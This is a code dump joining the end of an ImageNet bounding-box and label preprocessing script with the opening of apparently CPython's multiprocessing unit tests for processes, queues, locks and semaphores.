List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a OFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels, indexs = _find_image_files(directory, ARGS.labels_file)
# ./train/n03085013/n03085013_23287.JPEG n03085013 508 652481
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels, indexs,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = open(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist mulitple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = open(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main():
assert not ARGS.shards % ARGS.num_threads, (
'Please make the ARGS.num_threads commensurate with ARGS.shards')
print('Saving results to %s' % ARGS.output_directory)
if not os.path.exists(ARGS.output_directory):
os.makedirs(ARGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(ARGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(ARGS.bounding_box_file)
# Run it!
if ARGS.name == 'validation':
_process_dataset('validation', ARGS.validation_directory,
ARGS.shards, synset_to_human, image_to_bboxes)
else:
_process_dataset('train', ARGS.train_directory, ARGS.shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
main()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
